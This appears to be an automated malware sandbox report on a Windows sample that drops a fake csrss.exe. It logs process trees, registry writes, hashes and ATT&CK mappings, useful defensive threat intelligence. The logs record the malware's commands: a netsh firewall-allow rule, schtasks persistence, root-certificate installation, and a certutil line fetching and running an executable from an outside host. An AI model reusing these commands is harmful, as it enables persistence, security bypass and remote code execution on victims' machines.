Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a31400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a419000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b8030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

pid	process
1496	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	1496	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Token: SeImpersonatePrivilege	1496	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
Token: SeSystemEnvironmentPrivilege	812	csrss.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.execmd.exe

description	pid	process	target process
PID 532 wrote to memory of 1984	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	cmd.exe
PID 532 wrote to memory of 1984	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	cmd.exe
PID 532 wrote to memory of 1984	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	cmd.exe
PID 532 wrote to memory of 1984	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	cmd.exe
PID 1984 wrote to memory of 1824	1984	cmd.exe	netsh.exe
PID 1984 wrote to memory of 1824	1984	cmd.exe	netsh.exe
PID 1984 wrote to memory of 1824	1984	cmd.exe	netsh.exe
PID 532 wrote to memory of 812	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	csrss.exe
PID 532 wrote to memory of 812	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	csrss.exe
PID 532 wrote to memory of 812	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	csrss.exe
PID 532 wrote to memory of 812	532	869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe	csrss.exe

C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
"C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
- C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe
  "C:\Users\Admin\AppData\Local\Temp\869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37.exe"
  2⤵
  - Windows security bypass
  - Loads dropped DLL
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Modifies data under HKEY_USERS
      PID:1824
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:812
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1620
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      PID:1652

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193343.log C:\Windows\Logs\CBS\CbsPersist_20230129193343.cab
1⤵
- Drops file in Windows directory
PID:548

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Disabling Security Tools

2

T1089

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
69KB

MD5
48d6d16f289f2f87b69dc0aa435d5b54

SHA1
d3575906dad0ba16d407d3cf0c17b44033867d8e

SHA256
fb965546158d0797062edf59175a5b722df7f793b36a5ca569ea402d227d3314

SHA512
589c81cc3ca7db658770c427a303f7a8eeb2bfa7518b3b7acac78affc73a675aacc1fbd529f4260d89ee225bdb6493649b9410b2652bf10b1aa480db135c5fab

Download Submit
C:\Windows\rss\csrss.exe

Filesize
3.9MB

MD5
fca1d24ce1db0281ac1c6cdd76fb0882

SHA1
89164a3660a20bc0bbaa2af28a0c9455a77ee04d

SHA256
869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

SHA512
3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
576KB

MD5
79d239e8c3993b4122bc6c69aa75b98e

SHA1
00b153573dbb5e073483ed20fa52c0e858ef50e3

SHA256
416f2e005ca28fe636aa88cdf9a58d1301053d93a29d4201fb0eb711885b3e52

SHA512
52c1a997f64b317071d37c114d3869055c5085802c1742ac7f471b6960671927707edf27ee44907912d47533a7c0be274279af1ab78fd1da3803c524af5a27ba

Download Submit
\Windows\rss\csrss.exe

Filesize
3.9MB

MD5
fca1d24ce1db0281ac1c6cdd76fb0882

SHA1
89164a3660a20bc0bbaa2af28a0c9455a77ee04d

SHA256
869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

SHA512
3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

Download Submit
\Windows\rss\csrss.exe

Filesize
3.9MB

MD5
fca1d24ce1db0281ac1c6cdd76fb0882

SHA1
89164a3660a20bc0bbaa2af28a0c9455a77ee04d

SHA256
869392632e94b6ad1da26063c2eae04638bc71711eb57af177594bb33a036b37

SHA512
3a993568d878b22e91e4b17b1283ad3a82263cb01b8dc7e7a66a061d46941f2a4267f439942eaed7ee2123ac6c5e04095627dc43e077e681379fc50abfb1cc4e

Download Submit
memory/532-72-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/532-63-0x0000000000D00000-0x00000000010A8000-memory.dmp

Filesize
3.7MB

Download
memory/532-64-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/532-66-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/532-60-0x0000000000D00000-0x00000000010A8000-memory.dmp

Filesize
3.7MB

Download
memory/812-71-0x0000000000ED0000-0x0000000001278000-memory.dmp

Filesize
3.7MB

Download
memory/812-76-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/812-75-0x0000000000ED0000-0x0000000001278000-memory.dmp

Filesize
3.7MB

Download
memory/812-74-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/812-73-0x0000000000ED0000-0x0000000001278000-memory.dmp

Filesize
3.7MB

Download
memory/812-69-0x0000000000000000-mapping.dmp

Download
memory/1496-58-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/1496-57-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/1496-54-0x0000000000DE0000-0x0000000001188000-memory.dmp

Filesize
3.7MB

Download
memory/1496-59-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/1496-56-0x0000000001190000-0x0000000001995000-memory.dmp

Filesize
8.0MB

Download
memory/1496-55-0x0000000000DE0000-0x0000000001188000-memory.dmp

Filesize
3.7MB

Download
memory/1824-65-0x000007FEFB8A1000-0x000007FEFB8A3000-memory.dmp

Filesize
8KB

Download
memory/1824-62-0x0000000000000000-mapping.dmp

Download
memory/1984-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads